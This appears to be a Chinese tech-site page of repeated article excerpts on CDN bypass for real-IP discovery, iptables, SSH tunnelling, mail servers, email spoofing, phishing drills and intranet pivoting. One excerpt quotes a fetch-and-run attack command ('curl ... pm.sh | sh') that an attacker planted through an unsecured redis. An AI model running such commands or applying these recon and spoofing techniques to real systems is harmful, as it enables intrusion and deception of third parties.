第三方通用组件漏洞struts thinkphp jboss ganglia zabbix
📷 1:先查一下分站的IP,很多情况是主站使用了 CDN 而分站没有使用。 类似这样 www.youngxj.cn使用了CDN ,那么 ip.youngxj.cn -->blog.youngxj.cn 等二级域名可能没有使用CDN,对于这种情况可以通过查询二级域名来获得真实的IP地址,值得注意的是 通过二级域名查询出来的IP地址不一定是主站的IP地址,有可能做了A记录,但是很有可能 在一个C端内,此时针对整个C端直接 扫开放了80端口的,一个一个访问即可。(当然博主的所有域名都是加上了cdn的,就不
1:先查一下分站的IP,很多情况是主站使用了 CDN 而分站没有使用。 类似这样 www.code521.com 使用了CDN ,那么 mail.code521.com blog.code521.com 等二级域名可能没有使用CDN,对于这种情况可以通过查询二级域名来获得真实的IP地址,值得注意的是 通过二级域名查询出来的IP地址不一定是主站的IP地址,有可能做了A记录,但是很有可能 在一个C端内,此时针对整个C端直接 扫开放了80端口的,一个一个访问即可。 2:用国外主机来ping 大部分C
1:先查一下分站的IP,很多情况是主站使用了 CDN 而分站没有使用。 类似这样 www.youngxj.cn使用了CDN ,那么 ip.youngxj.cn -->blog.youngxj.cn 等二级域名可能没有使用CDN,对于这种情况可以通过查询二级域名来获得真实的IP地址,值得注意的是 通过二级域名查询出来的IP地址不一定是主站的IP地址,有可能做了A记录,但是很有可能 在一个C端内,此时针对整个C端直接 扫开放了80端口的,一个一个访问即可。(当然博主的所有域名都是加上了cdn的,就不必那
大部分CDN提供商只针对国内市场,而对国外市场几乎是不做CDN,所以有很大的几率会直接解析到真实IP。其实这个方法根本不用上国外vpn,因为你上国外vpn的ping本质,就是使用国外dns(那台vpn服务器使用的dns)查询域名而已,所以只需要:nslookup xxx.com 国外dns,就行了,例如:nslookup xxx.com 8.8.8.8,提示:你要找冷门国外DNS才行,像谷歌的DNS,国内用的人越来越多了,很多CDN提供商都把谷歌DNS作为国内市场之一,所以,你查到的结果会和国内差不了多少 (核总的原话)
对于进程和端口的监控,可以使用zabbix自带的key进行监控,只需要在server端维护就可以了,相比于nagios使用插件去监控的方式更为简单。下面简单介绍配置: 监控端口 zabbix监控端口使用如下key: key:net.tcp.listen[port] Checks if this port is in LISTEN state. 0 - it is not, 1 - it is inLISTEN state. 解释: 监听端口状态,返回结果为1,则运行;返回结果为0,则没有运行。比如监控ssh
回答:为了能够最快速的筛掉不必要的数据包,我们的拒绝规则肯定是要放在前面的,接受的放在后面。
让我们先来了解一下端口转发的概念吧。我们知道,SSH 会自动加密和解密所有 SSH 客户端与服务端之间的网络数据。但是,SSH 还同时提供了一个非常有用的功能,这就是端口转发。它能够将其他 TCP 端口的网络数据通过 SSH 链接来转发,并且自动提供了相应的加密及解密服务。这一过程有时也被叫做“隧道”(tunneling),这是因为 SSH 为其他 TCP 链接提供了一个安全的通道来进行传输而得名。例如,Telnet,SMTP,LDAP 这些 TCP 应用均能够从中得益,避免了用户名,密码以及隐私信息的明文传输。而与此同时,如果您工作环境中的防火墙限制了一些网络端口的使用,但是允许 SSH 的连接,那么也是能够通过将 TCP 端口转发来使用 SSH 进行通讯。总的来说 SSH 端口转发能够提供两大功能:
netfilter/iptables(简称为iptables)组成Linux平台下的包过滤防火墙,与大多数的Linux软件一样,这个包过滤防火墙是免费的,它可以代替昂贵的商业防火墙解决方案,完成封包过滤、封包重定向和网络地址转换(NAT)等功能。
刚看了大佬的一场直播,不得不感叹大佬们实在tql,在此就直播中的一些点自己简单做的一些笔记,加油
这是一种新的墙,以前我新建日本的vps的时候,其IPv4地址是直接的ping不通,但这次不一样,IPv4地址能够正常的ping,可就是国外与国内扫描端口不一样!
怎样使用本地服务器搭建一个邮箱,这样就可以脱离qq或者其他企业邮箱的限制,即可以做到节省成本,又可以得到收发邮件的一个保密性。 这里我们先展示一下本地搭建邮箱服务器后的成功例子:
打开天眼查,输入公司名称—>进入公司主页—>找到知识产权部分。即可看到很多知识产权信息,点击详情即可看到发明人姓名
许多新手第一次买了服务器都不知道该怎样使用,尤其是没有接触过linux的朋友对命令行界面几乎不了解,主机笔记今天就记录下使用国外软件xshell连接linux服务器的过程,供参考。 首先使用百度搜索x
作为一名菜鸟,第一次写文章,有点紧张,希望大佬们轻点。 我写这个是对自己的一个总结和记录,也希望对新手有所帮助!
上两个章节熟悉并了解了什么是防火墙,防火墙的工具iptables以及iptables原理和应用。这一篇是具体的详细实验操作。
防火墙: 工作在主机或者网络边缘,对于进出的数据报文按照事先定义好的规则进行检查,监控,一旦符合标准,我们就按照事先定义好的规则处理动作的一套机制组件叫做(网络)(主机)防火墙
大部分公司内部测试服务器是放在公司内网,一般来说,由于NAT的原因,这种访问是单向的。例如,我们借助电脑,手机登设备,可以访问百度的服务器,但是百度服务器是没法主动访问我们终端。由于只能通过公司内网访问,员工回家之后就无法访问了,安全是安全了,但是万一有个需求需要从公司外部访问呢?
作为一名菜鸟,写文章,有点紧张,希望大佬们轻点。 我写这个是对自己的一个总结和记录,也希望对新手有所帮助。
上一章我们为发电子邮件准备了贴心的表单,完善的数据验证,那么本篇我们讲解如何在laravel内发送一封电子邮件。
最近主机受到攻击,原因可能是redis集群没有设置密码(因为快过期了,不想搞得太复杂就没设),然后被人家搞事情了,就被人一把set了些执行脚本,形如curl -fsSL http://d.powerofwish.com/pm.sh | sh,真的是猥琐啊,我登上主机一看,简直是猥琐至极,不能忍了啊。
当我们在外网打下一个点,通过arp,netstat,以及ifconifg(ipconfig)等信息收集,发现此点为dmz,可通内网,那么这时候我们需要在此点上搭建通向内网的隧道,为内网渗透打下坚实基础。
换了腾讯云国内的主机后,最近发现每次 SSH 上去都很艰难,一开始使用 fabric 自动部署博客上去还行,到后来直接超时。于是简单搜索了下,发现问题所在。
所以一封邮件的流程是: 发件人:MUA --发送–> MTA -> 若干个MTA… -> MTA -> MDA <–收取-- MUA:收件人
上面这两条,请注意--dport为目标端口,当数据从外部进入服务器为目标端口;反之,数据从服务器出去则为数据源端口,使用 --sport 同理,-s是指定源地址,-d是指定目标地址。
iptables 安装 yum install iptables iptables 规则清除 iptables -F iptables -X iptables -Z 开放指定的端口 允许本地回环接口(即运行本机访问本机) iptables -A INPUT -s 127.0.0.1 -d 127.0.0.1 -j ACCEPT 允许所有本机向外的访问 iptables -A OUTPUT -j ACCEPT 允许访问22端口 iptables -A INPUT -p tcp --dport
重要:要部署自己的邮局,请先确认服务器的25端口是开放的,入站出站都是OK的才行,阿里云腾讯云的服务器25端口默认都是封的。不太好解封。所以要试玩搭建poste.io 最好用一个国外的机器
Xshell安装使用教程:如何通过Xshell连接管理linux服务器,在Windows系统下安装Xshell后通过SSH连接管理Linux系统图文教程。 Xshell是一款优秀的连接ssh服务器软件,能在Windows下远程访问管理我们的Linux VPS云服务器,支持SSH1, SSH2协议。从而达到远程控制终端的目的。这里以我们通过Xshell6.0连接Centos系统为例。 使用xshell连接到Linux服务器需要有VPS主机的:ip地址、端口号、用户名、密码。
3月6日上午,邮箱连续收到两封以税务发票“Tax Invoice”为主题的邮件,全部是英文信息,接收时间分别是早上8:27和9:15,附件是windows系统.cab压缩格式文件,内含PE文件,初一看,是一个很直接、很low的攻击方式。
这次的靶机为DC系列第四个靶机,这系列的靶机设计的很不错,每个靶机环境都比较相似,但是每一个靶机都需要不同的技术和技巧,闲话不多说,下载地址:https://download.vulnhub.com/dc/DC-4.zip,感兴趣自行下载。
Netfilter/Iptables(以下简称Iptables)是unix/linux自带的一款优秀且开放源代码的安全自由的**基于包过滤的防火墙工具**,它的功能十分强大,使用非常灵活,可以对流入和流出服务器的数据包进行很精细的控制。特别是它可以在一台非常低的硬件配置下跑的非常好
0x00. 引言 我用swaks 发送一封以我们公司CTO为显示发件人(腾讯企业邮箱)的伪造邮件给我的一个同事,邮件的内容就是让这位同事去CTO的办公司一趟,没想到这位同事真的去了,然后一脸懵逼的回来了。 恶作剧算是完了,但是这让我开始研究伪造邮件是为什么产生的,腾讯企业邮为什么没有拦截。 0x01. 关于伪造邮件的一些总结 1) 邮件服务商之间转发邮件是不需要认证的,也就是说MTA 到MTA之间转发邮件是不需要认证的,这是SMTP协议本身定义的。 所以协议钓鱼邮件就可以伪称来自某某MTA发送钓鱼邮件;
2.通过路由器连接的两个网络 网络层ip提供的是一个逐跳协议,提供了一种不可靠的服务,中间有可能会丢 传输层tcp在ip的基础上提供了可靠的传输层
最近在准备部署个人博客到线上,需要购买一个云服务器,其实选择有挺多,比较热门的例如阿里云,腾讯云,金山云,百度云等,我博客第一版是采用的阿里云,当时因为对windows系统比较熟悉,所以选择了阿里云windows操作系统的云服务器,这次主要是想玩下linux系统,所以这次架构我放弃了更熟悉的windows版本,我选择了腾讯云 CentOS 7.2 64位的云服务器。
在前几章中,我们知道了攻击者可以使用XSS提取用户信息凭证,然而,它的威力可不止于此,只要稍加一些社会工程学,攻击者就可以使用XSS来欺骗用户下载执行恶意文件,从而进一步控制主机和内网。
最近,有客户说他网站在国外,但国内网站速度打开非常慢,因为国内国外用户访问都比较频繁,希望对他们的网站www.pjcourse.com国内访问速度做个提升。他们的程序用的是wordpress。总的来说,wordpress的插件模板加载数据比较多,就算安装了wprocket这类缓存插件,做了js,css压缩,或者数据库优化。其实对网站的速度也并不会有太大提升。
操作系统centos centos7版本之前使用的是iptables,centos7版本之后变更为firewalld。 iptables配置实例 iptables命令可用于配置Linux的包过滤规则,常用于实现防火墙、NAT。 文件位置 /etc/sysconfig/iptables IPTABLES的设置情况 v:显示详细信息,包括每条规则的匹配包数量和匹配字节数 x:在 v 的基础上,禁止自动单位换算(K、M) vps侦探 n:只显示IP地址和端口号,不将ip解析为域名 iptables -L -n
1、概述 Email是Internet最基本、最重要的服务之一。与传统的邮政信件服务相比,电子邮件具有快速、经济的特点。与实时信息相比,电子邮件采用存储转发的方式,发送邮件时并不需要收件人处于在线状态。因此,电子邮件具有其他通信方式不可比拟的优势。
邮件营销,一个昔日辉煌,如今没落的广告营销方式,曾经的恶意广告邮件群发,到现在还存留着的大站协议群发,可能还是有不少人能够做到正常群发邮件,但大概率很多人都不会点开邮件查看邮件内容吧,除非是很许可的,重要的邮件通知,比如面试相关邮件。
大家好,我是Mandy。今天分享的主题内容是如何使用GitLab搭建属于自己的代码管理平台。
得到通知需要对某单位内部员工进行一次钓鱼邮件演练,因为之前接触的不多,钓鱼只是娱乐性的自己钓自己,记录下思路和踩坑。
相似这么www.xxx.com 运用了CDN ,那么 mail.code521.com blog.code521.com 等二级域名也许没有运用CDN,关于这种状况能够经过查询二级域名来获得实在的IP地址,值得注意的是 经过二级域名查询出来的IP地址不一定是主站的IP地址,有也许做了A记载,可是很有也许 在一个C端内,此刻针对全部C端直接 扫开放了80端口的,一个一个拜访即可。
1:先查一下分站的IP,许多状况是主站运用了 CDN 而分站没有运用。 相似这么www.xxx.com 运用了CDN ,那么 mail.code521.com blog.code521.com 等二级域名也许没有运用CDN,关于这种状况能够经过查询二级域名来获得实在的IP地址,值得注意的是 经过二级域名查询出来的IP地址不一定是主站的IP地址,有也许做了A记载,可是很有也许 在一个C端内,此刻针对全部C端直接 扫开放了80端口的,一个一个拜访即可。 2:大部分CDN供给商只针对国内市场,而对国外市场几乎
2016-06-1011:03:08 发表评论 18℃热度 一键部署工具选择 系统选择 连接虚拟主机 开始一键部署 目录 上一回说道:小白搭建博客教程之流程,这次趁着端午节写完它,也算是一个了结。 📷 教程有4篇: 购买域名; 购买虚拟主机并搭建(Linux); 域名解析; wordpress等博客平台安装步骤。 下面开始第二篇: 虚拟主机选择 域名有了,接下来要有主体,一个虚拟主机,可以让你的博客或者网站放在虚拟主机上“跑”起来。域名就好比车牌号,虚拟主机就好比发动
thr0cyte,Gr33k,花花,MrTools,R1ght0us,7089bAt
必备知识:国内的服务器需要备案,包括ICP域名备案和公安备案。而国外的服务器不需要备案。 如果你的域名是国内平台买的,那么请买国内的服务器,如果你的域名是国外平台买的,那么请买国外的服务器(当然了,域名也能转)
领取专属 10元无门槛券
手把手带您无忧上云